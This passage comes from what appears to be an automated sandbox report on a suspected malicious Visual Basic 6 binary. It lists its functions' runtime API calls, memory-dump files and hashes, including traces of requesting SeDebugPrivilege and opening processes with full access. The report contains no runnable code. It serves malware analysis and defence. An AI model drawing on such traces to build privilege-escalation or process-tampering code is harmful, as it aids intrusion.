                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,-00000001), ref: 0040FE96
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,00000000,?,-00000001), ref: 0040FE9B
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,-00000001), ref: 0040FEAD
                                                                                                                                                            • __vbaLenBstr.MSVBVM60 ref: 0040FEC0
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?,?), ref: 0040FEF3
                                                                                                                                                            • #631.MSVBVM60(?,-00000002,?,?), ref: 0040FF09
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,-00000002,?,?), ref: 0040FF14
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,-00000002,?,?), ref: 0040FF19
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 0040FF69
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Free$BstrList$#631ErrorOverflow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 43011225-0
                                                                                                                                                            • Opcode ID: 885353d30146d4874439d9188de8ce179380beda0541da3dfd58a4a737dd6ec3
                                                                                                                                                            • Instruction ID: f3b2892753be04fed0370ccfbe7307407226e01e24b32ae3149310476cb42e92
                                                                                                                                                            • Opcode Fuzzy Hash: 885353d30146d4874439d9188de8ce179380beda0541da3dfd58a4a737dd6ec3
                                                                                                                                                            • Instruction Fuzzy Hash: C7417475A00209AFD714DFA4CD85E9E7B79FB89700F10413BF901B76A0DA74A948CBA4
                                                                                                                                                            Function 00410FB0 Relevance: 27.1, APIs: 18, Instructions: 106COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404BAC,?,?), ref: 0041103F
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041104B
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404BAC,00000094,?), ref: 00411064
                                                                                                                                                            • __vbaStrI4.MSVBVM60(?), ref: 00411077
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00411087
                                                                                                                                                            • __vbaStrCat.MSVBVM60(004057CC,00000000), ref: 00411095
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041109F
                                                                                                                                                            • __vbaStrI4.MSVBVM60(?,00000000), ref: 004110A9
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004110B3
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 004110B6
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004110C0
                                                                                                                                                            • __vbaStrCat.MSVBVM60(004057CC,00000000), ref: 004110C8
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004110D2
                                                                                                                                                            • __vbaStrI4.MSVBVM60(?,00000000), ref: 004110DC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004110E6
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 004110E9
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004110F3
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,?), ref: 00411121
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Ansi$ErrorFreeListSystem
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 669208520-0
                                                                                                                                                            • Opcode ID: 15d97e58667047e38884c40753fbc310222c58e867efe20913db211b95d16ab2
                                                                                                                                                            • Instruction ID: 84428951c38bdac4841b214fd1cb50a500f43101e76cc919ffdd761ca84df74b
                                                                                                                                                            • Opcode Fuzzy Hash: 15d97e58667047e38884c40753fbc310222c58e867efe20913db211b95d16ab2
                                                                                                                                                            • Instruction Fuzzy Hash: AD410EB1D00218ABCB65EB65CD44BEABBB9EF48700F1041EAE509B3160DE746F85CF94
                                                                                                                                                            Function 00418F30 Relevance: 25.7, APIs: 17, Instructions: 169COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(72A219DC,00000000,00000FEE), ref: 00418FAE
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(72A219DC,00000000,00000FEE), ref: 00418FC2
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 00418FE9
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?), ref: 00419003
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041901E
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00419022
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?), ref: 0041902E
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00419049
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00419052
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,00000000,?), ref: 0041907B
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?), ref: 0041908B
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?), ref: 00419091
                                                                                                                                                            • __vbaPutOwner3.MSVBVM60(00407524,?,?), ref: 004190A4
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(72A219DC,00000000,00000FEE), ref: 004190D1
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(72A219DC,00000000,00000FEE), ref: 004190E1
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,0041912C), ref: 00419125
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(72A219DC,00000000,00000FEE), ref: 0041913F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$BoundsGenerate$LockUnlock$DestructOverflowOwner3RedimSystem
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3281955820-0
                                                                                                                                                            • Opcode ID: a8d7f946882eaeb5c4532af24fa3ee9707f2f5aa847c5e00e51107734879214e
                                                                                                                                                            • Instruction ID: 4833bfc8c810be8c7ee48596b44bcdea636671ab31cf8706ef4dadcd7055b152
                                                                                                                                                            • Opcode Fuzzy Hash: a8d7f946882eaeb5c4532af24fa3ee9707f2f5aa847c5e00e51107734879214e
                                                                                                                                                            • Instruction Fuzzy Hash: 4A51B470A00215AFDB14DF64DDA5AFABBB5FB49740F21802AE505A7350C774ACC2CBA9
                                                                                                                                                            Function 0040ACA0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 97COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040ACBE
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040AD05
                                                                                                                                                            • __vbaStrCat.MSVBVM60( RO,?,?,?,?,?,004025E6), ref: 0040AD3D
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040AD48
                                                                                                                                                            • __vbaStrCat.MSVBVM60(Once,?,?,00000000,?,?,?,?,004025E6), ref: 0040AD61
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040AD6C
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000,?,?,?,?,004025E6), ref: 0040AD87
                                                                                                                                                            • __vbaStrCat.MSVBVM60( RO,?,?,?,004025E6), ref: 0040ADA2
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,004025E6), ref: 0040ADAD
                                                                                                                                                            • __vbaStrCat.MSVBVM60(Once,?,?,00000000,?,?,004025E6), ref: 0040ADC7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,004025E6), ref: 0040ADD2
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000,?,?,004025E6), ref: 0040ADED
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$FreeList$ChkstkError
                                                                                                                                                            • String ID: RO$Once
                                                                                                                                                            • API String ID: 3210543181-275216174
                                                                                                                                                            • Opcode ID: 1063fae4adbd8224e8995746d70fbb9a1f5e9435d9e4a9119fec7327904956c2
                                                                                                                                                            • Instruction ID: 52c490b129e582bc3dafaca85e5bb0199f8b140a8a0a8e676f0dccd7654b22b4
                                                                                                                                                            • Opcode Fuzzy Hash: 1063fae4adbd8224e8995746d70fbb9a1f5e9435d9e4a9119fec7327904956c2
                                                                                                                                                            • Instruction Fuzzy Hash: C9413471900208EFD704DF94DE49BEEBBB8FB4C304F108129F916A72A0DB755A44CBA9
                                                                                                                                                            Function 00410C70 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 118COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,004100E0), ref: 00410C8E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,00000000,72A26C30,72A20EBE,00000000,004025E6), ref: 00410CBE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60 ref: 00410CD3
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000028,?), ref: 00410CEB
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,0000001C,?,0000001C), ref: 00410D3B
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,SeDebugPrivilege,?), ref: 00410D5A
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 00410D6B
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00410D83
                                                                                                                                                            • __vbaCopyBytes.MSVBVM60(00000008,?,?), ref: 00410DE0
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 00410E35
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$System$AnsiBytesChkstkCopyFree
                                                                                                                                                            • String ID: SeDebugPrivilege
                                                                                                                                                            • API String ID: 1749655604-2896544425
                                                                                                                                                            • Opcode ID: 04da8b57d56f5e8948f32b002b4eec2032f8abb5c96d1fa08769b245c696df47
                                                                                                                                                            • Instruction ID: 19430b606137baf8db46125749817fb036df22dc0e74aca3634fbbd968d53a81
                                                                                                                                                            • Opcode Fuzzy Hash: 04da8b57d56f5e8948f32b002b4eec2032f8abb5c96d1fa08769b245c696df47
                                                                                                                                                            • Instruction Fuzzy Hash: E3512EB1900308DBDB14DFA1DA09BEEB7B8BB04704F20812EE105BB191D7B85A89DF55
                                                                                                                                                            Function 00418A10 Relevance: 22.6, APIs: 15, Instructions: 76COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 00418A2E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00418A5B
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00418A67
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF), ref: 00418A76
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,?), ref: 00418A8F
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 00418A9F
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00418AAD
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00418AB6
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?), ref: 00418ACB
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 00418ADB
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00418AE9
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00418AF2
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 00418B08
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00418B32), ref: 00418B22
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00418B2B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$ErrorFree$System$AnsiCopyUnicode$Chkstk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3031735744-0
                                                                                                                                                            • Opcode ID: de2cb393b24f7ac5ffc4dd8badd9aec4615ba2a8af61c512e53155f7c5b6804a
                                                                                                                                                            • Instruction ID: 31f6dc709dd63b5e7e6354cc984dc1dfaca077b65c72c4c2232904d0b2341183
                                                                                                                                                            • Opcode Fuzzy Hash: de2cb393b24f7ac5ffc4dd8badd9aec4615ba2a8af61c512e53155f7c5b6804a
                                                                                                                                                            • Instruction Fuzzy Hash: A031FCB5800209EBCB04DFE4DE58ADE7B78FB48315F108559F211B72A0DB756A44CB68
                                                                                                                                                            Function 0040FF70 Relevance: 21.1, APIs: 14, Instructions: 80COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(72A26C30,72A26A76,00000000), ref: 0040FFAA
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000001), ref: 0040FFBD
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FFCA
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,00000000), ref: 0040FFCE
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0040FFE2
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000001), ref: 0040FFF5
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FFFC
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,00000000), ref: 00410001
                                                                                                                                                            • #616.MSVBVM60(?,-00000001), ref: 00410011
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041001C
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00410021
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0041002D
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0041005D), ref: 00410056
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 00410073
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$FreeMove$#537Copy$#616ErrorOverflow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3249593964-0
                                                                                                                                                            • Opcode ID: 1275576801f9687499aa79f0ee0564375320d38fe15e01250de86d500da99eea
                                                                                                                                                            • Instruction ID: 3391faed527fa42239c90739200fcb3ec4dff878199542e7df0cbe2f1190cda9
                                                                                                                                                            • Opcode Fuzzy Hash: 1275576801f9687499aa79f0ee0564375320d38fe15e01250de86d500da99eea
                                                                                                                                                            • Instruction Fuzzy Hash: EC212F71D00109ABCB04DFA5DD89AEFBB78FF59700F10812AE516B72A0DB785945CB98
                                                                                                                                                            Function 00419700 Relevance: 19.6, APIs: 13, Instructions: 120COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,72A26C30,00000000,72A256DE), ref: 0041975B
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?), ref: 00419775
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00419796
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004197A5
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?), ref: 004197B2
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004197CD
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004197D6
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,00000000,?), ref: 004197F9
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?), ref: 00419809
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?), ref: 0041980F
                                                                                                                                                            • __vbaPutOwner3.MSVBVM60(00407524,?,?), ref: 00419822
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,0041984F,72A26C30,00000000,72A256DE), ref: 00419848
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(00000000,72A26C30,00000000,72A256DE), ref: 00419860
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$BoundsGenerate$LockUnlock$DestructOverflowOwner3RedimSystem
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3281955820-0
                                                                                                                                                            • Opcode ID: ccc3478dbcd7e51189b4f7c35bd8fb3331cd942d6aa921c6006e7f43fcf8eea8
                                                                                                                                                            • Instruction ID: 91cd715af1cd97156beb3a758445edf250c8698d8b352ee1a2a14870601594c5
                                                                                                                                                            • Opcode Fuzzy Hash: ccc3478dbcd7e51189b4f7c35bd8fb3331cd942d6aa921c6006e7f43fcf8eea8
                                                                                                                                                            • Instruction Fuzzy Hash: E0418F75910219AFCB04EFA4CD95AEEB7B9FF48700F14811AE501B7290D7B4AC81CBE9
                                                                                                                                                            Function 00410560 Relevance: 18.1, APIs: 12, Instructions: 129COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6,?,?,?,?,?,?,?,?,004025E6), ref: 0041057E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 004105AE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(001F03FF,00000000,?,?,?,?,?,004025E6), ref: 004105E8
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 00410611
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 00410627
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000004,00000000,?,?,?,?,004025E6), ref: 00410645
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,004025E6), ref: 0041067E
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(001F03FF,00000000,?,?,?,?,?,004025E6), ref: 004106D3
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 004106FC
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 00410712
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,004025E6), ref: 00410735
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,004025E6), ref: 00410758
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$System$Chkstk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1207130036-0
                                                                                                                                                            • Opcode ID: f5c9d8337edf4c4349df2560f1f55107cb5225afca8f6c2b6187f381ddb5ba03
                                                                                                                                                            • Instruction ID: 2137da7fcd73fff1979705b1bef70d61cd8a95bb74c88752949aaefb45c8b53a
                                                                                                                                                            • Opcode Fuzzy Hash: f5c9d8337edf4c4349df2560f1f55107cb5225afca8f6c2b6187f381ddb5ba03
                                                                                                                                                            • Instruction Fuzzy Hash: 6C5107B4901208EBDB14DFA4DA48BDEBBB4FF48314F20805AE51477390C7B99A84DF69
                                                                                                                                                            Function 00410E60 Relevance: 18.1, APIs: 12, Instructions: 85COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,0040BC66,0041B038,?,?,?,004025E6), ref: 00410E7E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00410EAE
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00410EC5
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,?,?,?,?,00000000,004025E6), ref: 00410ED1
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(0041B038,?,?,?,?,?,00000000,004025E6), ref: 00410EDF
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00410EE8
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,00000000,00000000,00000000,?,?,?,?,00000000,004025E6), ref: 00410F03
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,00000000,00000000,?,?,?,?,00000000,004025E6), ref: 00410F14
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,?,00000000,004025E6), ref: 00410F25
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(0041B038,?,?,?,?,?,00000000,004025E6), ref: 00410F33
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(00000000,?,?,?,?,?,00000000,004025E6), ref: 00410F41
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,00000000,004025E6), ref: 00410F57
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$AnsiErrorUnicode$FreeSystem$ChkstkList
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3861917509-0
                                                                                                                                                            • Opcode ID: c1be402e434711134876b1e75af30f3fda5167bf00b65e5935c09ae6f9679a43
                                                                                                                                                            • Instruction ID: d7813b94c935956c428f1e1f47a44fa569b160c913a03527725d119065563702
                                                                                                                                                            • Opcode Fuzzy Hash: c1be402e434711134876b1e75af30f3fda5167bf00b65e5935c09ae6f9679a43
                                                                                                                                                            • Instruction Fuzzy Hash: 9E31ECB5901208EFDB04DFA4DA49BDEBBB8FB48714F108119F515BB290D7B89A44CBA4
                                                                                                                                                            Function 0040FA50 Relevance: 18.1, APIs: 12, Instructions: 67COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(0040AA6C,004025E6,0040AA6C,?,?,?,00000000,004025E6), ref: 0040FA6E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,0040AA6C,004025E6,0040AA6C), ref: 0040FA9E
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 0040FABD
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 0040FACA
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,?), ref: 0040FAE9
                                                                                                                                                            • #570.MSVBVM60(?), ref: 0040FAFB
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 0040FB02
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FB0D
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,?), ref: 0040FB25
                                                                                                                                                            • __vbaFileClose.MSVBVM60(?), ref: 0040FB37
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040FB4A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0040FB7E), ref: 0040FB77
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$FileFree$#525#570#648ChkstkCloseCopyErrorGet3MoveOpen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 947554498-0
                                                                                                                                                            • Opcode ID: e9e615465a2034f7d721f361e5a725c75608ada2b2abae78992f9bdf205b699b
                                                                                                                                                            • Instruction ID: 2ea1275da5938a61f9bbdbea3727b2d8b601beaa9e21b66b0b90c65097ce1408
